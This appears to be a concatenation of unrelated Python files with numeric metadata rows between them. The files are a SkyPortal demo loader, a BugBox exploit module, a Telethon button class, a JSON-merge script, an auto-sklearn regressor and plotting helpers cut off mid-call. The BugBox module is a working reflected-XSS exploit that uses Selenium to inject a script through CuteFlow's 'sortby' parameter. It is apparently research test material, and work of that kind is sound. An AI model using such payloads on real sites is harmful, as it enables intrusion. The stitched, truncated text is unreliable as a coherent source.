for model in Base.metadata.tables:
print(" -", model)
with status(f"Creating permissions"):
setup_permissions()
with status(f"Creating dummy users"):
super_admin_user = User(
username="testuser@cesium-ml.org", role_ids=["Super admin"]
)
group_admin_user = User(
username="groupadmin@cesium-ml.org", role_ids=["Super admin"]
)
full_user = User(username="fulluser@cesium-ml.org", role_ids=["Full user"])
view_only_user = User(
username="viewonlyuser@cesium-ml.org", role_ids=["View only"]
)
DBSession().add_all(
[super_admin_user, group_admin_user, full_user, view_only_user]
)
for u in [super_admin_user, group_admin_user, full_user, view_only_user]:
DBSession().add(
TornadoStorage.user.create_social_auth(u, u.username, "google-oauth2")
)
with status("Creating token"):
token = create_token(
[
"Manage groups",
"Manage sources",
"Upload data",
"Comment",
"Manage users",
],
super_admin_user.id,
"load_demo_data token",
)
def assert_post(endpoint, data):
response_status, data = api("POST", endpoint, data, token)
if not (response_status == 200 and data["status"] == "success"):  # raise unless the call succeeded
raise RuntimeError(
f'API call to {endpoint} failed with status {response_status}: {data["message"]}'
)
return data
with status("Launching web app & executing API calls"):
try:
response_status, data = api("GET", "sysinfo", token=token)
app_already_running = True
except requests.ConnectionError:
app_already_running = False
web_client = subprocess.Popen(
["make", "run"], cwd=basedir, preexec_fn=os.setsid
)
server_url = f"http://localhost:{cfg['ports.app']}"
print()
print(f"Waiting for server to appear at {server_url}...")
try:
verify_server_availability(server_url)
print("App running - continuing with API calls")
with status("Creating dummy group & adding users"):
data = assert_post(
"groups",
data={
"name": "Stream A",
"group_admins": [
super_admin_user.username,
group_admin_user.username,
],
},
)
group_id = data["data"]["id"]
for u in [view_only_user, full_user]:
data = assert_post(
f"groups/{group_id}/users/{u.username}", data={"admin": False}
)
with status("Creating dummy instruments"):
data = assert_post(
"telescope",
data={
"name": "Palomar 1.5m",
"nickname": "P60",
"lat": 33.3633675,
"lon": -116.8361345,
"elevation": 1870,
"diameter": 1.5,
"group_ids": [group_id],
},
)
telescope1_id = data["data"]["id"]
data = assert_post(
"instrument",
data={
"name": "P60 Camera",
"type": "phot",
"band": "optical",
"telescope_id": telescope1_id,
},
)
instrument1_id = data["data"]["id"]
data = assert_post(
"telescope",
data={
"name": "Nordic Optical Telescope",
"nickname": "NOT",
"lat": 28.75,
"lon": 17.88,
"elevation": 1870,
"diameter": 2.56,
"group_ids": [group_id],
},
)
telescope2_id = data["data"]["id"]
data = assert_post(
"instrument",
data={
"name": "ALFOSC",
"type": "both",
"band": "optical",
"telescope_id": telescope2_id,
},
)
with status("Creating dummy sources"):
SOURCES = [
{
"id": "14gqr",
"ra": 353.36647,
"dec": 33.646149,
"redshift": 0.063,
"group_ids": [group_id],
"comments": [
"No source at transient location to R>26 in LRIS imaging",
"Strong calcium lines have emerged.",
],
},
{
"id": "16fil",
"ra": 322.718872,
"dec": 27.574113,
"redshift": 0.0,
"group_ids": [group_id],
"comments": ["Frogs in the pond", "The eagle has landed"],
},
]
(basedir / "static/thumbnails").mkdir(parents=True, exist_ok=True)
for source_info in SOURCES:
comments = source_info.pop("comments")
data = assert_post("sources", data=source_info)
assert data["data"]["id"] == source_info["id"]
for comment in comments:
data = assert_post(
"comment",
data={"source_id": source_info["id"], "text": comment},
)
phot_file = basedir / "skyportal/tests/data/phot.csv"
phot_data = pd.read_csv(phot_file)
data = assert_post(
"photometry",
data={
"source_id": source_info["id"],
"time_format": "iso",
"time_scale": "utc",
"instrument_id": instrument1_id,
"observed_at": phot_data.observed_at.tolist(),
"mag": phot_data.mag.tolist(),
"e_mag": phot_data.e_mag.tolist(),
"lim_mag": phot_data.lim_mag.tolist(),
"filter": phot_data["filter"].tolist(),
},
)
spec_file = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
"skyportal",
"tests",
"data",
"spec.csv",
)
spec_data = pd.read_csv(spec_file)
for i, df in spec_data.groupby("instrument_id"):
data = assert_post(
"spectrum",
data={
"source_id": source_info["id"],
"observed_at": str(datetime.datetime(2014, 10, 24)),
"instrument_id": 1,
"wavelengths": df.wavelength.tolist(),
"fluxes": df.flux.tolist(),
},
)
for ttype in ["new", "ref", "sub"]:
fname = f'{source_info["id"]}_{ttype}.png'
fpath = basedir / f"skyportal/tests/data/{fname}"
thumbnail_data = base64.b64encode(
open(os.path.abspath(fpath), "rb").read()
)
data = assert_post(
"thumbnail",
data={
"source_id": source_info["id"],
"data": thumbnail_data,
"ttype": ttype,
},
)
source = Source.query.get(source_info["id"])
source.add_linked_thumbnails()
finally:
if not app_already_running:
print("Terminating web app")
os.killpg(os.getpgid(web_client.pid), signal.SIGTERM)
| 37.446565
| 88
| 0.428804
| 835
| 9,811
| 4.838323
| 0.323353
| 0.029703
| 0.038119
| 0.017327
| 0.126733
| 0.101485
| 0.065842
| 0.045545
| 0.045545
| 0.045545
| 0
| 0.02218
| 0.466925
| 9,811
| 261
| 89
| 37.590038
| 0.750287
| 0
| 0
| 0.165217
| 0
| 0
| 0.172745
| 0.025232
| 0
| 0
| 0
| 0
| 0.056522
| 1
| 0.004348
| false
| 0
| 0.069565
| 0
| 0.078261
| 0.021739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
134f9288b26ce3d17a1dc1a42f04cbaea4914dea
| 1,537
|
py
|
Python
|
framework/Exploits/CUTEFLOW_0024.py
|
UncleWillis/BugBox
|
25682f25fc3222db383649a4924bcd65f2ddcb34
|
[
"BSD-3-Clause"
] | 1
|
2019-01-25T21:32:42.000Z
|
2019-01-25T21:32:42.000Z
|
framework/Exploits/CUTEFLOW_0024.py
|
UncleWillis/BugBox
|
25682f25fc3222db383649a4924bcd65f2ddcb34
|
[
"BSD-3-Clause"
] | null | null | null |
framework/Exploits/CUTEFLOW_0024.py
|
UncleWillis/BugBox
|
25682f25fc3222db383649a4924bcd65f2ddcb34
|
[
"BSD-3-Clause"
] | 1
|
2021-06-23T04:44:25.000Z
|
2021-06-23T04:44:25.000Z
|
# Copyright 2013 University of Maryland. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE.TXT file.
import sys
import os
import time
from selenium.common.exceptions import NoAlertPresentException
import framework
class Exploit (framework.Exploit):
attributes = {'Name' : "CUTEFLOW_0024",
'Description' : "CuteFlow v2.11.2 cross site scripting attack.",
'References' : [['http://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/']],
'Target' : "CuteFlow 2.11.2",
'TargetLicense' : '',
'VulWikiPage' : "",
'Type' : 'XSS'
}
def __init__(self, visible=False):
framework.Exploit.__init__(self, visible)
self.verified = False
return
def exploit(self):
driver = self.create_selenium_driver()
driver.get("http://localhost/cuteflow/pages/showmaillist.php?sortby=\"><script>alert(\"XSS\");</script><p+\"")
self.logger.info("XSS link visited")
try:
driver.get_alert()
self.logger.info("XSS popup comfirmed")
self.verified = True
except NoAlertPresentException:
self.logger.error("XSS failed")
if self.visible:
time.sleep(10)
driver.cleanup()
return
def verify(self):
return self.verified
| 29
| 134
| 0.582954
| 160
| 1,537
| 5.525
| 0.625
| 0.010181
| 0.024887
| 0.027149
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028116
| 0.305791
| 1,537
| 52
| 135
| 29.557692
| 0.800375
| 0.1054
| 0
| 0.058824
| 0
| 0.029412
| 0.243066
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088235
| false
| 0
| 0.147059
| 0.029412
| 0.382353
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
134fbec769aed9e0795c724b3dcc54286150a284
| 10,720
|
py
|
Python
|
telethon/tl/custom/button.py
|
HosseyNJF/Telethon
|
0b0a1dc6a1a3f2fc8593526549889fba2884e8b8
|
[
"MIT"
] | 4
|
2020-11-28T08:50:07.000Z
|
2020-12-13T03:44:05.000Z
|
telethon/tl/custom/button.py
|
HosseyNJF/Telethon
|
0b0a1dc6a1a3f2fc8593526549889fba2884e8b8
|
[
"MIT"
] | 4
|
2020-10-11T15:40:17.000Z
|
2020-10-22T09:06:58.000Z
|
telethon/tl/custom/button.py
|
HosseyNJF/Telethon
|
0b0a1dc6a1a3f2fc8593526549889fba2884e8b8
|
[
"MIT"
] | 2
|
2020-01-16T12:21:02.000Z
|
2021-12-16T01:30:11.000Z
|
from .. import types
from ... import utils
class Button:
"""
.. note::
This class is used to **define** reply markups, e.g. when
sending a message or replying to events. When you access
`Message.buttons <telethon.tl.custom.message.Message.buttons>`
they are actually `MessageButton
<telethon.tl.custom.messagebutton.MessageButton>`,
so you might want to refer to that class instead.
Helper class to allow defining ``reply_markup`` when
sending a message with inline or keyboard buttons.
You should make use of the defined class methods to create button
instances instead of making them yourself (i.e. don't do ``Button(...)``
but instead use methods like `Button.inline(...) <inline>` etc.).
You can use `inline`, `switch_inline`, `url` and `auth`
together to create inline buttons (under the message).
You can use `text`, `request_location`, `request_phone` and `request_poll`
together to create a reply markup (replaces the user keyboard).
You can also configure the aspect of the reply with these.
The latest message with a reply markup will be the one shown to the user
(messages contain the buttons, not the chat itself).
You **cannot** mix the two type of buttons together,
and it will error if you try to do so.
The text for all buttons may be at most 142 characters.
If more characters are given, Telegram will cut the text
to 128 characters and add the ellipsis (…) character as
the 129th.
"""
def __init__(self, button, *, resize, single_use, selective):
self.button = button
self.resize = resize
self.single_use = single_use
self.selective = selective
@staticmethod
def _is_inline(button):
"""
Returns `True` if the button belongs to an inline keyboard.
"""
return isinstance(button, (
types.KeyboardButtonCallback,
types.KeyboardButtonSwitchInline,
types.KeyboardButtonUrl,
types.InputKeyboardButtonUrlAuth
))
@staticmethod
def inline(text, data=None):
"""
Creates a new inline button with some payload data in it.
If `data` is omitted, the given `text` will be used as `data`.
In any case `data` should be either `bytes` or `str`.
Note that the given `data` must be less than or equal to 64 bytes.
If more than 64 bytes are passed as data, ``ValueError`` is raised.
If you need to store more than 64 bytes, consider saving the real
data in a database and a reference to that data inside the button.
When the user clicks this button, `events.CallbackQuery
<telethon.events.callbackquery.CallbackQuery>` will trigger with the
same data that the button contained, so that you can determine which
button was pressed.
"""
if not data:
data = text.encode('utf-8')
elif not isinstance(data, (bytes, bytearray, memoryview)):
data = str(data).encode('utf-8')
if len(data) > 64:
raise ValueError('Too many bytes for the data')
return types.KeyboardButtonCallback(text, data)
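# Usage sketch (editor's addition): the payload must stay within 64 bytes,
# otherwise the ValueError above is raised.
#   Button.inline('Confirm')                 # data defaults to b'Confirm'
#   Button.inline('Confirm', b'confirm:42')  # explicit bytes payload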
@staticmethod
def switch_inline(text, query='', same_peer=False):
"""
Creates a new inline button to switch to inline query.
If `query` is given, it will be the default text to be used
when making the inline query.
If ``same_peer is True`` the inline query will directly be
set under the currently opened chat. Otherwise, the user will
have to select a different dialog to make the query.
When the user clicks this button, after a chat is selected, their
input field will be filled with the username of your bot followed
by the query text, ready to make inline queries.
"""
return types.KeyboardButtonSwitchInline(text, query, same_peer)
@staticmethod
def url(text, url=None):
"""
Creates a new inline button to open the desired URL on click.
If no `url` is given, the `text` will be used as said URL instead.
You cannot detect that the user clicked this button directly.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to open the displayed URL unless
the domain is trusted, and once confirmed the URL will open in their
device.
"""
return types.KeyboardButtonUrl(text, url or text)
@staticmethod
def auth(text, url=None, *, bot=None, write_access=False, fwd_text=None):
"""
Creates a new inline button to authorize the user at the given URL.
You should set the `url` to be on the same domain as the one configured
for the desired `bot` via `@BotFather <https://t.me/BotFather>`_ using
the ``/setdomain`` command.
For more information about letting the user login via Telegram to
a certain domain, see https://core.telegram.org/widgets/login.
If no `url` is specified, it will default to `text`.
Args:
bot (`hints.EntityLike`):
The bot that requires this authorization. By default, this
is the bot that is currently logged in (itself), although
you may pass a different input peer.
.. note::
For now, you cannot use ID or username for this argument.
If you want to use a different bot than the one currently
logged in, you must manually use `client.get_input_entity()
<telethon.client.users.UserMethods.get_input_entity>`.
write_access (`bool`):
Whether write access is required or not.
This is `False` by default (read-only access).
fwd_text (`str`):
The new text to show in the button if the message is
forwarded. By default, the button text will be the same.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to login to the specified domain.
"""
return types.InputKeyboardButtonUrlAuth(
text=text,
url=url or text,
bot=utils.get_input_user(bot or types.InputUserSelf()),
request_write_access=write_access,
fwd_text=fwd_text
)
@classmethod
def text(cls, text, *, resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button with the given text.
Args:
resize (`bool`):
If present, the entire keyboard will be reconfigured to
be resized and be smaller if there are not many buttons.
single_use (`bool`):
If present, the entire keyboard will be reconfigured to
be usable only once before it hides itself.
selective (`bool`):
If present, the entire keyboard will be reconfigured to
be "selective". The keyboard will be shown only to specific
users. It will target users that are @mentioned in the text
of the message or to the sender of the message you reply to.
When the user clicks this button, a text message with the same text
as the button will be sent, and can be handled with `events.NewMessage
<telethon.events.newmessage.NewMessage>`. You cannot distinguish
between a button press and the user typing and sending exactly the
same text on their own.
"""
return cls(types.KeyboardButton(text),
resize=resize, single_use=single_use, selective=selective)
@classmethod
def request_location(cls, text, *,
resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button to request the user's location on click.
``resize``, ``single_use`` and ``selective`` are documented in `text`.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to share their location with the
bot, and if confirmed a message with geo media will be sent.
"""
return cls(types.KeyboardButtonRequestGeoLocation(text),
resize=resize, single_use=single_use, selective=selective)
@classmethod
def request_phone(cls, text, *,
resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button to request the user's phone on click.
``resize``, ``single_use`` and ``selective`` are documented in `text`.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to share their phone with the
bot, and if confirmed a message with contact media will be sent.
"""
return cls(types.KeyboardButtonRequestPhone(text),
resize=resize, single_use=single_use, selective=selective)
@classmethod
def request_poll(cls, text, *, force_quiz=False,
resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button to request the user to create a poll.
If `force_quiz` is `False`, the user will be allowed to choose whether
they want their poll to be a quiz or not. Otherwise, the user will be
forced to create a quiz when creating the poll.
If a poll is a quiz, there will be only one answer that is valid, and
the votes cannot be retracted. Otherwise, users can vote and retract
the vote, and the poll might be multiple choice.
``resize``, ``single_use`` and ``selective`` are documented in `text`.
When the user clicks this button, a screen letting the user create a
poll will be shown, and if they do create one, the poll will be sent.
"""
return cls(types.KeyboardButtonRequestPoll(text, quiz=force_quiz),
resize=resize, single_use=single_use, selective=selective)
@staticmethod
def clear():
"""
Clears all keyboard buttons after sending a message with this markup.
When used, no other button should be present or it will be ignored.
"""
return types.ReplyKeyboardHide()
@staticmethod
def force_reply():
"""
Forces a reply to the message with this markup. If used,
no other button should be present or it will be ignored.
"""
return types.ReplyKeyboardForceReply()
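# Usage sketch (editor's addition; assumes a connected Telethon client named `client`
# and that `send_message` accepts a `buttons=` keyword of nested button rows):
#   await client.send_message(chat, 'Pick one:', buttons=[
#       [Button.inline('Yes', b'yes'), Button.inline('No', b'no')],
#       [Button.url('Project page', 'https://github.com/LonamiWebs/Telethon')],
#   ])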
| 40.916031
| 79
| 0.638619
| 1,441
| 10,720
| 4.713393
| 0.229702
| 0.025766
| 0.017668
| 0.020024
| 0.262073
| 0.257362
| 0.238221
| 0.21702
| 0.209953
| 0.199352
| 0
| 0.002515
| 0.295149
| 10,720
| 261
| 80
| 41.072797
| 0.895977
| 0.641511
| 0
| 0.276923
| 0
| 0
| 0.013186
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.184615
| false
| 0
| 0.030769
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
134fdc98faac6c7e555a1d8a47d4c15e48a09ce5
| 1,575
|
py
|
Python
|
src/main/resources/pys/join.py
|
addUsername/javaBoring
|
d576adbd21447085f56719e8cc871faf94d8a369
|
[
"MIT"
] | null | null | null |
src/main/resources/pys/join.py
|
addUsername/javaBoring
|
d576adbd21447085f56719e8cc871faf94d8a369
|
[
"MIT"
] | null | null | null |
src/main/resources/pys/join.py
|
addUsername/javaBoring
|
d576adbd21447085f56719e8cc871faf94d8a369
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 7 20:14:22 2020
Simple script to join json files
@author: SERGI
"""
import json
import sys
import os
def readJson(path):
with open(path, "r") as file:
return json.load(file)
def writeJson(path, dicc):
with open(path, "w") as file:
json.dump(dicc, file)
if __name__ == "__main__":
print("hello from python", flush=True)
jsonPath = str(sys.argv[1])
# =============================================================================
# jsonPath = "../eclipse-workspace/prueba/target/json/"
# =============================================================================
jsonPathTemp = jsonPath+"temp/"
arr = os.listdir(jsonPathTemp)
arr.sort()
print(arr)
dict_to_json = {}
dict_0 = readJson(jsonPathTemp + arr[0])
dict_1 = readJson(jsonPathTemp + arr[1])
dict_2 = readJson(jsonPathTemp + arr[2])
dict_3 = readJson(jsonPathTemp + arr[3])
keys = [name for name in dict_0.keys() if "0" not in name]
for key in keys:
dict_to_json[key] = dict_0[key] + dict_1[key] + dict_2[key] + dict_3[key]
#0seg,f_step,f_stop
seg = dict_0['0seg,f_step,f_stop'][0]
step = dict_0['0seg,f_step,f_stop'][1]
stop = dict_3['0seg,f_step,f_stop'][2]
dict_to_json['0seg,f_step,f_stop'] = [seg, step, stop]
print("Escribiendo json: ", jsonPath+arr[0], flush=True)
writeJson(jsonPath+arr[0], dict_to_json)
print("finish", flush=True)
| 28.125
| 82
| 0.533333
| 206
| 1,575
| 3.893204
| 0.364078
| 0.093516
| 0.05611
| 0.062344
| 0.107232
| 0.089776
| 0.047382
| 0
| 0
| 0
| 0
| 0.033389
| 0.239365
| 1,575
| 56
| 83
| 28.125
| 0.63606
| 0.215873
| 0
| 0
| 0
| 0
| 0.110351
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.096774
| 0
| 0.193548
| 0.129032
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13513f9e059c5209134cdb28c07c7e40eb9e7c97
| 8,756
|
py
|
Python
|
autosk_dev_test/component/LinReg.py
|
hmendozap/master-arbeit-files
|
5c1b90bc4a424313234b84bad405799de6f8d2ed
|
[
"MIT"
] | 2
|
2018-01-18T06:25:21.000Z
|
2018-12-11T07:43:09.000Z
|
autosk_dev_test/component/LinReg.py
|
hmendozap/master-arbeit-files
|
5c1b90bc4a424313234b84bad405799de6f8d2ed
|
[
"MIT"
] | 1
|
2016-03-29T07:55:18.000Z
|
2016-03-29T07:55:18.000Z
|
autosk_dev_test/component/LinReg.py
|
hmendozap/master-arbeit-files
|
5c1b90bc4a424313234b84bad405799de6f8d2ed
|
[
"MIT"
] | null | null | null |
import numpy as np
import scipy.sparse as sp
from HPOlibConfigSpace.configuration_space import ConfigurationSpace
from HPOlibConfigSpace.conditions import EqualsCondition, InCondition
from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, \
UniformIntegerHyperparameter, CategoricalHyperparameter, Constant
from autosklearn.pipeline.components.base import AutoSklearnRegressionAlgorithm
from autosklearn.pipeline.constants import *
class LinReg(AutoSklearnRegressionAlgorithm):
def __init__(self, number_updates, batch_size, dropout_output,
learning_rate, solver, lambda2,
momentum=0.99, beta1=0.9, beta2=0.9, rho=0.95,
lr_policy='fixed', gamma=0.01, power=1.0, epoch_step=2,
random_state=None):
self.number_updates = number_updates
self.batch_size = batch_size
self.dropout_output = dropout_output
self.learning_rate = learning_rate
self.lr_policy = lr_policy
self.lambda2 = lambda2
self.momentum = momentum
self.beta1 = 1-beta1 if beta1 is not None else 0.9
self.beta2 = 1-beta2 if beta2 is not None else 0.99
self.rho = rho
self.solver = solver
self.gamma = gamma
self.power = power
self.epoch_step = epoch_step
# Empty features and shape
self.n_features = None
self.input_shape = None
self.m_issparse = False
self.m_isregression = True
self.m_isbinary = False
self.m_ismultilabel = False
self.estimator = None
def _prefit(self, X, y):
self.batch_size = int(self.batch_size)
self.n_features = X.shape[1]
self.input_shape = (self.batch_size, self.n_features)
self.num_output_units = 1 # Regression
# Normalize the output
self.mean_y = np.mean(y)
self.std_y = np.std(y)
y = (y - self.mean_y) / self.std_y
if len(y.shape) == 1:
y = y[:, np.newaxis]
self.m_issparse = sp.issparse(X)
return X, y
def fit(self, X, y):
Xf, yf = self._prefit(X, y)
epoch = (self.number_updates * self.batch_size)//X.shape[0]
number_epochs = min(max(2, epoch), 110) # Cap the max number of possible epochs
from implementation import LogisticRegression
self.estimator = LogisticRegression.LogisticRegression(batch_size=self.batch_size,
input_shape=self.input_shape,
num_output_units=self.num_output_units,
dropout_output=self.dropout_output,
learning_rate=self.learning_rate,
lr_policy=self.lr_policy,
lambda2=self.lambda2,
momentum=self.momentum,
beta1=self.beta1,
beta2=self.beta2,
rho=self.rho,
solver=self.solver,
num_epochs=number_epochs,
gamma=self.gamma,
power=self.power,
epoch_step=self.epoch_step,
is_sparse=self.m_issparse,
is_binary=self.m_isbinary,
is_multilabel=self.m_ismultilabel,
is_regression=self.m_isregression)
self.estimator.fit(Xf, yf)
return self
def predict(self, X):
if self.estimator is None:
raise NotImplementedError
preds = self.estimator.predict(X, self.m_issparse)
return preds * self.std_y + self.mean_y
def predict_proba(self, X):
if self.estimator is None:
raise NotImplementedError()
return self.estimator.predict_proba(X, self.m_issparse)
@staticmethod
def get_properties(dataset_properties=None):
return {'shortname': 'lin_reg',
'name': 'Linear Regression',
'handles_regression': True,
'handles_classification': False,
'handles_multiclass': False,
'handles_multilabel': False,
'is_deterministic': True,
'input': (DENSE, SPARSE, UNSIGNED_DATA),
'output': (PREDICTIONS,)}
@staticmethod
def get_hyperparameter_search_space(dataset_properties=None):
policy_choices = ['fixed', 'inv', 'exp', 'step']
batch_size = UniformIntegerHyperparameter("batch_size",
100, 3000,
log=True,
default=150)
number_updates = UniformIntegerHyperparameter("number_updates",
500, 10500,
log=True,
default=500)
dropout_output = UniformFloatHyperparameter("dropout_output", 0.0, 0.99,
default=0.5)
lr = UniformFloatHyperparameter("learning_rate", 1e-6, 0.1,
log=True,
default=0.01)
l2 = UniformFloatHyperparameter("lambda2", 1e-6, 1e-2,
log=True,
default=1e-3)
solver = CategoricalHyperparameter(name="solver",
choices=["sgd", "adam"],
default="sgd")
beta1 = UniformFloatHyperparameter("beta1", 1e-4, 0.1,
log=True,
default=0.1)
beta2 = UniformFloatHyperparameter("beta2", 1e-4, 0.1,
log=True,
default=0.01)
lr_policy = CategoricalHyperparameter(name="lr_policy",
choices=policy_choices,
default='fixed')
gamma = UniformFloatHyperparameter(name="gamma",
lower=1e-3, upper=1e-1,
default=1e-2)
power = UniformFloatHyperparameter("power",
0.0, 1.0,
default=0.5)
epoch_step = UniformIntegerHyperparameter("epoch_step",
2, 20,
default=5)
cs = ConfigurationSpace()
cs.add_hyperparameter(number_updates)
cs.add_hyperparameter(batch_size)
cs.add_hyperparameter(dropout_output)
cs.add_hyperparameter(lr)
cs.add_hyperparameter(l2)
cs.add_hyperparameter(solver)
cs.add_hyperparameter(beta1)
cs.add_hyperparameter(beta2)
cs.add_hyperparameter(lr_policy)
cs.add_hyperparameter(gamma)
cs.add_hyperparameter(power)
cs.add_hyperparameter(epoch_step)
beta1_depends_on_solver = EqualsCondition(beta1, solver, "adam")
beta2_depends_on_solver = EqualsCondition(beta2, solver, "adam")
gamma_depends_on_policy = InCondition(child=gamma, parent=lr_policy,
values=['inv', 'exp', 'step'])
power_depends_on_policy = EqualsCondition(power, lr_policy, 'inv')
epoch_step_depends_on_policy = EqualsCondition(epoch_step,
lr_policy, 'step')
cs.add_condition(beta1_depends_on_solver)
cs.add_condition(beta2_depends_on_solver)
cs.add_condition(gamma_depends_on_policy)
cs.add_condition(power_depends_on_policy)
cs.add_condition(epoch_step_depends_on_policy)
return cs
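# A minimal usage sketch for the component above, assuming the environment the
# module itself imports (HPOlibConfigSpace plus the local `implementation`
# package that provides LogisticRegression) and synthetic regression data; the
# hyperparameter values below are illustrative, not recommended settings.
if __name__ == "__main__":
    rng = np.random.RandomState(0)
    X_demo = rng.rand(200, 8)
    y_demo = np.dot(X_demo, rng.rand(8)) + 0.05 * rng.randn(200)
    print(LinReg.get_hyperparameter_search_space())   # inspect the search space
    model = LinReg(number_updates=500, batch_size=100, dropout_output=0.5,
                   learning_rate=0.01, solver="sgd", lambda2=1e-3)
    model.fit(X_demo, y_demo)   # requires the companion `implementation` package
    print(model.predict(X_demo)[:5])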
| 44.222222
| 102
| 0.489721
| 773
| 8,756
| 5.335058
| 0.208279
| 0.020611
| 0.055286
| 0.006547
| 0.117119
| 0.079777
| 0.03904
| 0.033948
| 0.024248
| 0
| 0
| 0.027104
| 0.439584
| 8,756
| 197
| 103
| 44.446701
| 0.813328
| 0.010736
| 0
| 0.0875
| 0
| 0
| 0.035001
| 0.002541
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04375
| false
| 0
| 0.05
| 0.00625
| 0.1375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13532d8edfc3e8c0a315f5cb2ba2e9ad01f479b5
| 2,427
|
py
|
Python
|
DigiPsych_API/Data_Science_API/evaluate_model.py
|
larryzhang95/Voice-Analysis-Pipeline
|
264ac5c70d0baab47b81718ea5b895be30a683e9
|
[
"Apache-2.0"
] | 7
|
2019-06-22T21:03:50.000Z
|
2021-11-21T19:46:55.000Z
|
DigiPsych_API/Data_Science_API/evaluate_model.py
|
larryzhang95/Voice-Analysis-Pipeline
|
264ac5c70d0baab47b81718ea5b895be30a683e9
|
[
"Apache-2.0"
] | null | null | null |
DigiPsych_API/Data_Science_API/evaluate_model.py
|
larryzhang95/Voice-Analysis-Pipeline
|
264ac5c70d0baab47b81718ea5b895be30a683e9
|
[
"Apache-2.0"
] | 3
|
2019-09-15T01:50:39.000Z
|
2021-12-22T02:36:36.000Z
|
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.model_selection import learning_curve, validation_curve
# Plot learning curve
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
plt.figure()
plt.title(title)
if ylim is not None:
plt.ylim(*ylim)
plt.xlabel("Training examples")
plt.ylabel("Score")
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.grid(True)
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="g")
plt.plot(train_sizes, train_scores_mean, 'o-', color="r",
label="Training score")
plt.plot(train_sizes, test_scores_mean, 'o-', color="g",
label="Validation score")
plt.legend(loc="best")
plt.show()
return plt
# Plot validation curve
def plot_validation_curve(estimator, title, X, y, param_name, param_range, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
    plt.figure()
    plt.title(title)
    train_scores, test_scores = validation_curve(
        estimator, X, y, param_name=param_name, param_range=param_range,
        cv=cv, n_jobs=n_jobs)
train_mean = np.mean(train_scores, axis=1)
train_std = np.std(train_scores, axis=1)
test_mean = np.mean(test_scores, axis=1)
test_std = np.std(test_scores, axis=1)
plt.plot(param_range, train_mean, color='r', marker='o', markersize=5, label='Training score')
plt.fill_between(param_range, train_mean + train_std, train_mean - train_std, alpha=0.15, color='r')
plt.plot(param_range, test_mean, color='g', linestyle='--', marker='s', markersize=5, label='Validation score')
plt.fill_between(param_range, test_mean + test_std, test_mean - test_std, alpha=0.15, color='g')
plt.grid(True)
plt.xscale('log')
plt.legend(loc='best')
plt.xlabel('Parameter')
plt.ylabel('Score')
plt.ylim(ylim)
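# A minimal usage sketch for the two helpers above, assuming scikit-learn's
# bundled diabetes dataset and a ridge regressor; the parameter grid and fold
# count are arbitrary illustrative choices.
if __name__ == "__main__":
    from sklearn.datasets import load_diabetes
    from sklearn.linear_model import Ridge
    from sklearn.model_selection import KFold

    X, y = load_diabetes(return_X_y=True)
    cv = KFold(n_splits=5, shuffle=True, random_state=0)
    plot_learning_curve(Ridge(alpha=1.0), "Ridge learning curve", X, y, cv=cv, n_jobs=1)
    plot_validation_curve(Ridge(), "Ridge validation curve", X, y,
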